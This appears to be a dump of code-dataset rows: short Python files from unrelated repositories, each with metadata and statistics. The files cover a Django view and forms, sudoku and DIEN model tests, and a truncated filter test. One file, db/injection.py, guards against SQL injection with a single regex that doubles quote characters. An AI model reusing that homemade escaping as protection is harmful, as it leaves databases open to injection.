2021-09-08T01:48:52.000Z
2022-03-12T00:21:26.000Z
GUI/__init__.py
LANCEREN/Graduation-Design_Py
7c636867efba91cb6a828fb9fd96046d5f844bce
[ "MIT" ]
null
null
null
# GUi设计 print("Loading GUI design Module ...")
12
38
0.666667
6
48
5.333333
1
0
0
0
0
0
0
0
0
0
0
0
0.166667
48
4
38
12
0.8
0.104167
0
0
0
0
0.707317
0
0
0
0
0
0
1
0
true
0
0
0
0
1
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
1
0
null
0
0
0
0
0
0
1
0
0
0
0
1
0
6
d32d495d9fe838f99ae4048f433eb0c411043f83
103
py
Python
DockerIntro/src/DjangoApp/views.py
Py-Himanshu-Patel/Learn-Docker
c8505a9b36c42269e8566c9368657463024a6fa6
[ "MIT" ]
null
null
null
DockerIntro/src/DjangoApp/views.py
Py-Himanshu-Patel/Learn-Docker
c8505a9b36c42269e8566c9368657463024a6fa6
[ "MIT" ]
null
null
null
DockerIntro/src/DjangoApp/views.py
Py-Himanshu-Patel/Learn-Docker
c8505a9b36c42269e8566c9368657463024a6fa6
[ "MIT" ]
null
null
null
from django.shortcuts import render def home(request): return render(request, 'DjangoApp/home.html')
20.6
46
0.786408
14
103
5.785714
0.785714
0
0
0
0
0
0
0
0
0
0
0
0.106796
103
4
47
25.75
0.880435
0
0
0
0
0
0.184466
0
0
0
0
0
0
1
0.333333
false
0
0.333333
0.333333
1
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
1
1
1
0
0
6
d3827ffa6a2c67ee2f13bb5c08aefe57a24118d4
54
py
Python
tests/core/test_import.py
vaporyproject/eth-rlp
a7f785aaf866ab6a40960034d05cb6439e8a9d74
[ "MIT" ]
13
2018-02-25T06:38:38.000Z
2021-11-04T14:09:39.000Z
tests/core/test_import.py
vaporyproject/eth-rlp
a7f785aaf866ab6a40960034d05cb6439e8a9d74
[ "MIT" ]
5
2018-04-25T23:02:28.000Z
2022-01-23T19:50:37.000Z
tests/core/test_import.py
vaporyproject/eth-rlp
a7f785aaf866ab6a40960034d05cb6439e8a9d74
[ "MIT" ]
13
2018-03-01T21:42:05.000Z
2022-03-28T18:34:20.000Z
def test_import(): import eth_rlp # noqa: F401
10.8
32
0.648148
8
54
4.125
0.875
0
0
0
0
0
0
0
0
0
0
0.075
0.259259
54
4
33
13.5
0.75
0.185185
0
0
0
0
0
0
0
0
0
0
0
1
0.5
true
0
1
0
1.5
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
1
0
1
0
1
0
0
6
d390482b69ab7b0bac12fe13826f4074792a79e4
158
py
Python
gpn/experiments/__init__.py
WodkaRHR/Graph-Posterior-Network
139e7c45c37324c9286e0cca60360a4978b3f411
[ "MIT" ]
23
2021-11-16T01:31:55.000Z
2022-03-04T05:49:03.000Z
gpn/experiments/__init__.py
WodkaRHR/Graph-Posterior-Network
139e7c45c37324c9286e0cca60360a4978b3f411
[ "MIT" ]
1
2021-12-17T01:25:16.000Z
2021-12-20T10:38:30.000Z
gpn/experiments/__init__.py
WodkaRHR/Graph-Posterior-Network
139e7c45c37324c9286e0cca60360a4978b3f411
[ "MIT" ]
7
2021-12-03T11:13:44.000Z
2022-02-06T03:12:10.000Z
from .transductive_experiment import TransductiveExperiment from .multiple_run_experiment import MultipleRunExperiment from .dataset import ExperimentDataset
39.5
59
0.905063
15
158
9.333333
0.666667
0.228571
0
0
0
0
0
0
0
0
0
0
0.075949
158
3
60
52.666667
0.958904
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
6cf082254965c857b7ee0ffc75acc66c811d99bd
186
py
Python
src/babylon/schemas/__init__.py
Bl4ck4/babylon
4c3f98be799d232b78d0bd4b4aa831f19338da37
[ "MIT" ]
null
null
null
src/babylon/schemas/__init__.py
Bl4ck4/babylon
4c3f98be799d232b78d0bd4b4aa831f19338da37
[ "MIT" ]
null
null
null
src/babylon/schemas/__init__.py
Bl4ck4/babylon
4c3f98be799d232b78d0bd4b4aa831f19338da37
[ "MIT" ]
1
2021-10-02T10:28:24.000Z
2021-10-02T10:28:24.000Z
try: from .recipe import Recipe except AssertionError: pass from .measured_in import MeasuredIn from .ingredient import Ingredient from .tag import Tag from .fridge import Fridge
23.25
35
0.795699
25
186
5.88
0.52
0
0
0
0
0
0
0
0
0
0
0
0.166667
186
8
36
23.25
0.948387
0
0
0
0
0
0
0
0
0
0
0
0.125
1
0
true
0.125
0.625
0
0.625
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
1
1
0
1
0
0
6
9fa2171b79ac2271ddd15536e9951063c8378512
39
py
Python
machine_learning_course/common/__init__.py
arekmula/MachineLearningCourse
5966dd2ad0ee23ef8f84d218a9f64e345900402e
[ "MIT" ]
null
null
null
machine_learning_course/common/__init__.py
arekmula/MachineLearningCourse
5966dd2ad0ee23ef8f84d218a9f64e345900402e
[ "MIT" ]
null
null
null
machine_learning_course/common/__init__.py
arekmula/MachineLearningCourse
5966dd2ad0ee23ef8f84d218a9f64e345900402e
[ "MIT" ]
null
null
null
from common.utils import read_csv_file
19.5
38
0.871795
7
39
4.571429
1
0
0
0
0
0
0
0
0
0
0
0
0.102564
39
1
39
39
0.914286
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
9fbcef75adcbf8eb68953245cbe70f0ee359685e
20
py
Python
EJ.py
kimty103/dataPreprocessing
1aa4078d70076c4dc46fd389aa4b6b98a1637718
[ "MIT" ]
null
null
null
EJ.py
kimty103/dataPreprocessing
1aa4078d70076c4dc46fd389aa4b6b98a1637718
[ "MIT" ]
null
null
null
EJ.py
kimty103/dataPreprocessing
1aa4078d70076c4dc46fd389aa4b6b98a1637718
[ "MIT" ]
null
null
null
import sys print(1)
6.666667
10
0.75
4
20
3.75
1
0
0
0
0
0
0
0
0
0
0
0.058824
0.15
20
3
11
6.666667
0.823529
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
0.5
0
0.5
0.5
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
0
1
0
6
9fcdb9e3f40d27ed8ffb94172501cf3d58a48754
43
py
Python
skrl/agents/torch/trpo/__init__.py
Toni-SM/skrl
15b429d89e3b8a1828b207d88463bf7090288d18
[ "MIT" ]
43
2021-12-19T07:47:43.000Z
2022-03-31T05:24:42.000Z
skrl/agents/torch/trpo/__init__.py
Toni-SM/skrl
15b429d89e3b8a1828b207d88463bf7090288d18
[ "MIT" ]
5
2022-01-05T07:54:13.000Z
2022-03-08T21:00:39.000Z
skrl/agents/torch/trpo/__init__.py
Toni-SM/skrl
15b429d89e3b8a1828b207d88463bf7090288d18
[ "MIT" ]
1
2022-01-31T17:53:52.000Z
2022-01-31T17:53:52.000Z
from .trpo import TRPO, TRPO_DEFAULT_CONFIG
43
43
0.860465
7
43
5
0.714286
0
0
0
0
0
0
0
0
0
0
0
0.093023
43
1
43
43
0.897436
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
4c89754bb0149c421f20ef67695096e6ae91114c
42
py
Python
functions/__init__.py
vlee489/AC31009-Client
71252f38c7bf4426ff84676cad517f66c3e6cb65
[ "CC-BY-4.0" ]
null
null
null
functions/__init__.py
vlee489/AC31009-Client
71252f38c7bf4426ff84676cad517f66c3e6cb65
[ "CC-BY-4.0" ]
null
null
null
functions/__init__.py
vlee489/AC31009-Client
71252f38c7bf4426ff84676cad517f66c3e6cb65
[ "CC-BY-4.0" ]
null
null
null
from .REST import * from .windows import *
21
22
0.738095
6
42
5.166667
0.666667
0
0
0
0
0
0
0
0
0
0
0
0.166667
42
2
22
21
0.885714
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
981cee6f97ee483a4c2fa12d53754803c07eb730
6,163
py
Python
prediction_flow/pytorch/tests/test_dien.py
dydcfg/prediction-flow
332068f521bba51acc8600fe72e36e92c331bef1
[ "MIT" ]
211
2019-08-02T23:04:40.000Z
2022-03-18T06:36:25.000Z
prediction_flow/pytorch/tests/test_dien.py
dydcfg/prediction-flow
332068f521bba51acc8600fe72e36e92c331bef1
[ "MIT" ]
18
2019-08-10T07:13:05.000Z
2022-03-17T10:45:30.000Z
prediction_flow/pytorch/tests/test_dien.py
dydcfg/prediction-flow
332068f521bba51acc8600fe72e36e92c331bef1
[ "MIT" ]
51
2019-08-02T23:04:41.000Z
2021-12-24T02:48:58.000Z
from prediction_flow.features import Number, Category, Sequence, Features from prediction_flow.transformers.column import ( StandardScaler, CategoryEncoder, SequenceEncoder) from prediction_flow.pytorch import AttentionGroup, DIEN from .utils import prepare_dataloader def create_test_data(): number_features = [ Number('userAge', StandardScaler()), Number('rating', StandardScaler())] category_features = [ Category('userId', CategoryEncoder(min_cnt=1)), Category('movieId', CategoryEncoder(min_cnt=1)), Category('topGenre', CategoryEncoder(min_cnt=1))] sequence_features = [ Sequence('title', SequenceEncoder(sep='|', min_cnt=1)), Sequence('genres', SequenceEncoder(sep='|', min_cnt=1)), Sequence('clickedMovieIds', SequenceEncoder(sep='|', min_cnt=1, max_len=5)), Sequence('clickedMovieTopGenres', SequenceEncoder(sep='|', min_cnt=1, max_len=5)), Sequence('noClickedMovieIds', SequenceEncoder(sep='|', min_cnt=1, max_len=5)), Sequence('noClickedMovieTopGenres', SequenceEncoder(sep='|', min_cnt=1, max_len=5))] attention_groups = [ AttentionGroup( name='group1', pairs=[{'ad': 'movieId', 'pos_hist': 'clickedMovieIds', 'neg_hist': 'noClickedMovieIds'}, {'ad': 'topGenre', 'pos_hist': 'clickedMovieTopGenres', 'neg_hist': 'noClickedMovieTopGenres'}], hidden_layers=[8, 4])] features = Features( number_features=number_features, category_features=category_features, sequence_features=sequence_features) dataloader, _ = prepare_dataloader(features) return dataloader, features, attention_groups def test_gru_gru_att(): dataloader, features, attention_groups = create_test_data() attention_groups[0].gru_type = 'GRU' model = DIEN( features, attention_groups=attention_groups, num_classes=2, embedding_size=4, hidden_layers=(16, 8), final_activation='sigmoid', dropout=0.3) model(next(iter(dataloader))) def test_gru_att_gru(): dataloader, features, attention_groups = create_test_data() attention_groups[0].gru_type = 'AIGRU' model = DIEN( features, attention_groups=attention_groups, num_classes=2, embedding_size=4, hidden_layers=(16, 8), final_activation='sigmoid', dropout=0.3) model(next(iter(dataloader))) def test_gru_agru(): dataloader, features, attention_groups = create_test_data() attention_groups[0].gru_type = 'AGRU' model = DIEN( features, attention_groups=attention_groups, num_classes=2, embedding_size=4, hidden_layers=(16, 8), final_activation='sigmoid', dropout=0.3) model(next(iter(dataloader))) def test_gru_augru(): dataloader, features, attention_groups = create_test_data() attention_groups[0].gru_type = 'AUGRU' model = DIEN( features, attention_groups=attention_groups, num_classes=2, embedding_size=4, hidden_layers=(16, 8), final_activation='sigmoid', dropout=0.3) model(next(iter(dataloader))) def test_gru_augru_neg(): dataloader, features, attention_groups = create_test_data() attention_groups[0].gru_type = 'AUGRU' model = DIEN( features, attention_groups=attention_groups, use_negsampling=True, num_classes=2, embedding_size=4, hidden_layers=(16, 8), final_activation='sigmoid', dropout=0.3) model(next(iter(dataloader))) def create_test_data_with_sharing_emb(): number_features = [ Number('userAge', StandardScaler()), Number('rating', StandardScaler())] # provide word to index mapping movie_word2idx = { '__PAD__': 0, '4226': 1, '5971': 2, '6291': 3, '7153': 4, '30707': 5, '3242': 6, '42': 7, '32': 8, '34': 9, '233': 10, '291': 11, '324': 12, '325': 13, '3542': 14, '322': 15, '33': 16, '45': 17, '__UNKNOWN__': 18} movie_idx2word = { index: word for word, index in movie_word2idx.items()} category_features = [ Category('movieId', CategoryEncoder( word2idx=movie_word2idx, idx2word=movie_idx2word), embedding_name='movieId'), Category('topGenre', CategoryEncoder(min_cnt=1))] sequence_features = [ Sequence('title', SequenceEncoder(sep='|', min_cnt=1)), Sequence('genres', SequenceEncoder(sep='|', min_cnt=1)), Sequence('clickedMovieIds', SequenceEncoder( sep='|', max_len=5, word2idx=movie_word2idx, idx2word=movie_idx2word), embedding_name='movieId'), Sequence('noClickedMovieIds', SequenceEncoder( sep='|', max_len=5, word2idx=movie_word2idx, idx2word=movie_idx2word), embedding_name='movieId')] attention_groups = [ AttentionGroup( name='group1', pairs=[{'ad': 'movieId', 'pos_hist': 'clickedMovieIds', 'neg_hist': 'noClickedMovieIds'}], hidden_layers=[8, 4])] features = Features( number_features=number_features, category_features=category_features, sequence_features=sequence_features) dataloader, _ = prepare_dataloader(features) return dataloader, features, attention_groups def test_gru_augru_neg_with_sharing_emb(): dataloader, features, attention_groups = ( create_test_data_with_sharing_emb()) attention_groups[0].gru_type = 'AUGRU' model = DIEN( features, attention_groups=attention_groups, use_negsampling=True, num_classes=2, embedding_size=4, hidden_layers=(16, 8), final_activation='sigmoid', dropout=0.3) model(next(iter(dataloader)))
30.509901
73
0.616096
627
6,163
5.779904
0.196172
0.115894
0.088852
0.05298
0.81181
0.786976
0.775386
0.762417
0.716611
0.671358
0
0.037274
0.264319
6,163
201
74
30.661692
0.76202
0.004706
0
0.633333
0
0
0.091324
0.014351
0
0
0
0
0
1
0.053333
false
0
0.026667
0
0.093333
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
e218563c19d985ad4ad32ed850a098be4c71ce93
123
py
Python
interface/models/errors.py
Flatlooker/simple_ml
468e86792a14bc8b7d432f36bfda11e581d5c40d
[ "Unlicense" ]
null
null
null
interface/models/errors.py
Flatlooker/simple_ml
468e86792a14bc8b7d432f36bfda11e581d5c40d
[ "Unlicense" ]
null
null
null
interface/models/errors.py
Flatlooker/simple_ml
468e86792a14bc8b7d432f36bfda11e581d5c40d
[ "Unlicense" ]
null
null
null
class ModelUnknown(Exception): pass class AsyncMismatch(Exception): pass class InvalidInput(Exception): pass
13.666667
31
0.739837
12
123
7.583333
0.5
0.428571
0.395604
0
0
0
0
0
0
0
0
0
0.186992
123
8
32
15.375
0.91
0
0
0.5
0
0
0
0
0
0
0
0
0
1
0
true
0.5
0
0
0.5
0
1
0
0
null
1
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
1
0
0
0
0
0
6
e21c7642d4d9e3a1483af7b1371441ad4590cae6
146
py
Python
tdd_python_code_samples/BestPractices_Example/DependencyTest.py
masayas/-Hands-on-Test-Driven-Development-with-Python
4879e2a26327ee766da1ae3245685e5f47bdc821
[ "MIT" ]
23
2018-05-30T05:11:17.000Z
2022-02-12T20:23:25.000Z
tdd_python_code_samples/BestPractices_Example/DependencyTest.py
masayas/-Hands-on-Test-Driven-Development-with-Python
4879e2a26327ee766da1ae3245685e5f47bdc821
[ "MIT" ]
null
null
null
tdd_python_code_samples/BestPractices_Example/DependencyTest.py
masayas/-Hands-on-Test-Driven-Development-with-Python
4879e2a26327ee766da1ae3245685e5f47bdc821
[ "MIT" ]
12
2018-06-24T04:12:04.000Z
2021-11-18T09:42:00.000Z
import TestVariables def test_one(): TestVariables.test_value = 1 assert True def test_two(): assert TestVariables.test_value == 1
14.6
40
0.719178
19
146
5.315789
0.526316
0.138614
0.435644
0.455446
0
0
0
0
0
0
0
0.017241
0.205479
146
9
41
16.222222
0.853448
0
0
0
0
0
0
0
0
0
0
0
0.333333
1
0.333333
true
0
0.166667
0
0.5
0
1
0
0
null
0
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
1
0
0
0
0
0
0
6
2c3bc7bb5e241bc7902972b07f52fde7dfb822a8
2,106
py
Python
Joy_QA_Platform/frame/utils/forms.py
bzc128/Joy_QA_Platform
d3325331cd832a22e91ad895ab793577609aabc4
[ "Apache-2.0" ]
123
2019-03-01T06:07:43.000Z
2021-12-11T07:59:20.000Z
Joy_QA_Platform/frame/utils/forms.py
bzc128/Joy_QA_Platform
d3325331cd832a22e91ad895ab793577609aabc4
[ "Apache-2.0" ]
8
2019-03-06T06:33:34.000Z
2021-06-10T21:13:55.000Z
Joy_QA_Platform/frame/utils/forms.py
bzc128/Joy_QA_Platform
d3325331cd832a22e91ad895ab793577609aabc4
[ "Apache-2.0" ]
54
2019-03-01T02:25:13.000Z
2021-12-23T16:55:17.000Z
from django import forms # 验证登录表单 class LoginForm(forms.Form): account = forms.CharField(required=True, error_messages={'required': "账号不能为空"}) password = forms.CharField(required=True, error_messages={'required': "密码不能为空"}) # 验证注册表单 class RegisterForm(forms.Form): email = forms.EmailField(required=True, error_messages={'required': "邮箱不能为空", 'invalid': "邮箱格式错误"}) password = forms.CharField(required=True, min_length=6, error_messages={'required': "密码不能为空", 'min_length': "密码至少6位"}) repassword = forms.CharField(required=True, min_length=6, error_messages={'required': "密码不能为空", 'min_length': "密码至少6位"}) username = forms.CharField(required=True, max_length=20, error_messages={'required': "用户名不能为空", 'max_length': "用户名最多为20位"}) emailcapture = forms.CharField(required=True, error_messages={'required': "验证码不能为空"}) # 验证重置密码表单 class ResetForm(forms.Form): email = forms.EmailField(required=True, error_messages={'required': "邮箱不能为空", 'invalid': "邮箱格式错误"}) password = forms.CharField(required=True, min_length=6, error_messages={'required': "密码不能为空", 'min_length': "密码至少6位"}) repassword = forms.CharField(required=True, min_length=6, error_messages={'required': "密码不能为空", 'min_length': "密码至少6位"}) emailcapture = forms.CharField(required=True, error_messages={'required': "验证码不能为空"})
45.782609
84
0.460589
152
2,106
6.243421
0.25
0.139094
0.243414
0.246575
0.783983
0.775553
0.775553
0.676502
0.676502
0.537408
0
0.010076
0.434473
2,106
45
85
46.8
0.786734
0.010446
0
0.722222
0
0
0.127885
0
0
0
0
0
0
1
0
false
0.138889
0.027778
0
0.416667
0
0
0
0
null
0
1
1
0
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
6
2c59ee6579970269fc8253537adaf274e897f948
58
py
Python
src/tests/testModules/partialModuleVariables/TrueNegative/customTypes.py
Trimatix/carica
074be16bdf50541eb3ba92ca42d0ad901cc51bd0
[ "Apache-2.0" ]
5
2021-09-08T07:29:23.000Z
2021-11-24T00:18:22.000Z
src/tests/testModules/partialModuleVariables/TrueNegative/customTypes.py
Trimatix/Carica
074be16bdf50541eb3ba92ca42d0ad901cc51bd0
[ "Apache-2.0" ]
42
2021-09-08T07:31:25.000Z
2022-01-16T17:39:34.000Z
src/tests/testModules/partialModuleVariables/TrueNegative/customTypes.py
Trimatix/carica
074be16bdf50541eb3ba92ca42d0ad901cc51bd0
[ "Apache-2.0" ]
null
null
null
class MyType: pass MyType MyType() MyType == MyType()
9.666667
18
0.672414
7
58
5.571429
0.428571
0.923077
0.923077
0
0
0
0
0
0
0
0
0
0.206897
58
6
18
9.666667
0.847826
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0.2
0
0
0.2
0
1
0
0
null
1
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
1
0
0
0
0
0
6
2c80979a9e74cc0360696b441cc420756888a3db
31
py
Python
fhlb/__init__.py
Solaxun/FHLB
3a54902c3f7ca12d734f8bf455fdac419f345739
[ "MIT" ]
null
null
null
fhlb/__init__.py
Solaxun/FHLB
3a54902c3f7ca12d734f8bf455fdac419f345739
[ "MIT" ]
null
null
null
fhlb/__init__.py
Solaxun/FHLB
3a54902c3f7ca12d734f8bf455fdac419f345739
[ "MIT" ]
null
null
null
from fhlb.client import Client
15.5
30
0.83871
5
31
5.2
0.8
0
0
0
0
0
0
0
0
0
0
0
0.129032
31
2
30
15.5
0.962963
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
2cbc11fb4ac78e7ac2c3838cf8f1fcd552325091
84
py
Python
db/injection.py
Mhs-220/NetworkSecurityProject
20dc7fcafc4647a15670a813cbdfefa66b7cda56
[ "MIT" ]
null
null
null
db/injection.py
Mhs-220/NetworkSecurityProject
20dc7fcafc4647a15670a813cbdfefa66b7cda56
[ "MIT" ]
null
null
null
db/injection.py
Mhs-220/NetworkSecurityProject
20dc7fcafc4647a15670a813cbdfefa66b7cda56
[ "MIT" ]
null
null
null
import re def escape_sql_injection(text): return re.sub(r"(\\*)'", r"''", text)
21
41
0.619048
13
84
3.846154
0.769231
0
0
0
0
0
0
0
0
0
0
0
0.142857
84
4
41
21
0.694444
0
0
0
0
0
0.094118
0
0
0
0
0
0
1
0.333333
false
0
0.333333
0.333333
1
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
1
1
1
0
0
6
2cbfe488434ade7751bef8b11777d84701d15cc4
2,207
py
Python
test_case01.py
mliezun/sudoku-solver
18b638b200be360ee6e8af0c7e612eb086924b98
[ "MIT" ]
null
null
null
test_case01.py
mliezun/sudoku-solver
18b638b200be360ee6e8af0c7e612eb086924b98
[ "MIT" ]
null
null
null
test_case01.py
mliezun/sudoku-solver
18b638b200be360ee6e8af0c7e612eb086924b98
[ "MIT" ]
null
null
null
import pytest from solver import Board, SudokuSolver def test_case01_easy(): b = Board([ [1, 0, 6, 0, 0, 2, 3, 0, 0], [0, 5, 0, 0, 0, 6, 0, 9, 1], [0, 0, 9, 5, 0, 1, 4, 6, 2], [0, 3, 7, 9, 0, 5, 0, 0, 0], [5, 8, 1, 0, 2, 7, 9, 0, 0], [0, 0, 0, 4, 0, 8, 1, 5, 7], [0, 0, 0, 2, 6, 0, 5, 4, 0], [0, 0, 4, 1, 5, 0, 6, 0, 9], [9, 0, 0, 8, 7, 4, 2, 1, 0], ]) assert repr(SudokuSolver.solve(b)) == repr([[1, 4, 6, 7, 9, 2, 3, 8, 5], [2, 5, 8, 3, 4, 6, 7, 9, 1], [3, 7, 9, 5, 8, 1, 4, 6, 2], [4, 3, 7, 9, 1, 5, 8, 2, 6], [ 5, 8, 1, 6, 2, 7, 9, 3, 4], [6, 9, 2, 4, 3, 8, 1, 5, 7], [7, 1, 3, 2, 6, 9, 5, 4, 8], [8, 2, 4, 1, 5, 3, 6, 7, 9], [9, 6, 5, 8, 7, 4, 2, 1, 3]]), "Wrong answer" def test_case01_hard(): b = Board([ [4, 0, 9, 3, 7, 0, 0, 0, 0], [1, 0, 0, 4, 2, 0, 0, 0, 0], [0, 0, 0, 0, 0, 9, 0, 1, 0], [5, 0, 0, 0, 0, 6, 0, 7, 0], [0, 6, 2, 0, 0, 0, 5, 8, 0], [0, 1, 0, 2, 0, 0, 0, 0, 3], [0, 2, 0, 8, 0, 0, 0, 0, 0], [0, 0, 0, 0, 5, 2, 0, 0, 8], [0, 0, 0, 0, 9, 7, 6, 0, 5], ]) assert repr(SudokuSolver.solve(b)) == repr([[4, 8, 9, 3, 7, 1, 2, 5, 6], [1, 5, 6, 4, 2, 8, 9, 3, 7], [2, 7, 3, 5, 6, 9, 8, 1, 4], [5, 4, 8, 9, 3, 6, 1, 7, 2], [ 3, 6, 2, 7, 1, 4, 5, 8, 9], [9, 1, 7, 2, 8, 5, 4, 6, 3], [6, 2, 5, 8, 4, 3, 7, 9, 1], [7, 9, 1, 6, 5, 2, 3, 4, 8], [8, 3, 4, 1, 9, 7, 6, 2, 5]]), "Wrong answer" def test_case01_empty(): b = Board([ [0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0], ]) assert repr(SudokuSolver.solve(b)) == repr([[1, 2, 3, 4, 5, 8, 9, 6, 7], [4, 5, 8, 6, 7, 9, 1, 2, 3], [9, 6, 7, 1, 2, 3, 8, 4, 5], [2, 1, 9, 8, 3, 4, 5, 7, 6], [ 3, 8, 4, 5, 6, 7, 2, 1, 9], [5, 7, 6, 9, 1, 2, 3, 8, 4], [8, 9, 1, 3, 4, 6, 7, 5, 2], [6, 3, 2, 7, 8, 5, 4, 9, 1], [7, 4, 5, 2, 9, 1, 6, 3, 8]]), "Wrong answer"
41.641509
168
0.333484
535
2,207
1.364486
0.052336
0.358904
0.452055
0.526027
0.443836
0.282192
0.227397
0.227397
0.135616
0.110959
0
0.352941
0.368373
2,207
52
169
42.442308
0.170732
0
0
0.340909
0
0
0.016312
0
0
0
0
0
0.068182
1
0.068182
false
0
0.045455
0
0.113636
0
0
0
1
null
1
1
1
0
0
0
0
0
0
0
1
0
0
0
0
0
1
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
39099f5b26a911c9bd75338a623c20b4123debfd
179
py
Python
categorical_encoding/__init__.py
isabella232/categorical_encoding
090e8d207aa14dd278e03209b4663cf9af0cad45
[ "BSD-3-Clause" ]
36
2019-08-14T22:01:24.000Z
2021-04-09T00:56:37.000Z
categorical_encoding/__init__.py
pplonski/categorical_encoding
a8ec786863cd69dabd03af440299075192fdc9b9
[ "BSD-3-Clause" ]
19
2019-08-22T19:10:10.000Z
2021-03-03T23:12:01.000Z
categorical_encoding/__init__.py
pplonski/categorical_encoding
a8ec786863cd69dabd03af440299075192fdc9b9
[ "BSD-3-Clause" ]
10
2019-09-23T19:34:42.000Z
2021-02-03T11:16:32.000Z
# flake8: noqa from .encoders import Encoder import categorical_encoding.encoders import categorical_encoding.primitives import categorical_encoding.tests __version__ = '0.4.1'
19.888889
38
0.837989
22
179
6.5
0.636364
0.356643
0.524476
0
0
0
0
0
0
0
0
0.024845
0.100559
179
8
39
22.375
0.863354
0.067039
0
0
0
0
0.030303
0
0
0
0
0
0
1
0
false
0
0.8
0
0.8
0
1
0
0
null
1
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
1
0
0
6
1a3778486414af97113c607aae1b449e7bff1602
255
py
Python
forks/baselines/baselines/common/__init__.py
AndrewPaulChester/sage-code
9fe676bfbcbc6f642eca29b30a1027fba2a426a0
[ "MIT" ]
null
null
null
forks/baselines/baselines/common/__init__.py
AndrewPaulChester/sage-code
9fe676bfbcbc6f642eca29b30a1027fba2a426a0
[ "MIT" ]
null
null
null
forks/baselines/baselines/common/__init__.py
AndrewPaulChester/sage-code
9fe676bfbcbc6f642eca29b30a1027fba2a426a0
[ "MIT" ]
null
null
null
# flake8: noqa F403 from forks.baselines.baselines.common.console_util import * from forks.baselines.baselines.common.dataset import Dataset from forks.baselines.baselines.common.math_util import * from forks.baselines.baselines.common.misc_util import *
42.5
60
0.839216
35
255
6.028571
0.371429
0.170616
0.341232
0.511848
0.720379
0.407583
0.407583
0
0
0
0
0.017021
0.078431
255
5
61
51
0.880851
0.066667
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
0
0
0
null
0
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
1a4914741250fd215a30dadded8acd09c42b5cca
12,407
py
Python
ifa_smeargle/testing/test_numerical_filters.py
scottwedge/IfA_Smeargle
d46a378e534020f8920a801880912aa973daec3b
[ "MIT" ]
null
null
null
ifa_smeargle/testing/test_numerical_filters.py
scottwedge/IfA_Smeargle
d46a378e534020f8920a801880912aa973daec3b
[ "MIT" ]
5
2020-06-08T22:19:37.000Z
2020-08-25T09:10:41.000Z
ifa_smeargle/testing/test_numerical_filters.py
scottwedge/IfA_Smeargle
d46a378e534020f8920a801880912aa973daec3b
[ "MIT" ]
1
2020-06-25T02:57:42.000Z
2020-06-25T02:57:42.000Z
""" This tests the filter functions to ensure that they are appropriately calculating the filters as expected. These filter tests operate on the principle that the product of single power prime integers is always unique, and by extension, so are their logarithms. Prime number arrays are filtered, multiplied together, and compared against an expected hard-coded result. """ import numpy as np import numpy.ma as np_ma import pytest import sympy as sy import math import ifa_smeargle.core as core import ifa_smeargle.masking as mask import ifa_smeargle.testing as test def test_filter_sigma_value(): """ This tests the filtering of sigma boundaries.""" # Creating the testing array. test_array = test.base.create_prime_test_array(shape=(10,10), index=50) # Prescribed filtering parameters # 1 Sigma sigma_multiple = 1 sigma_iterations = 2 # Create the filter. test_filter = 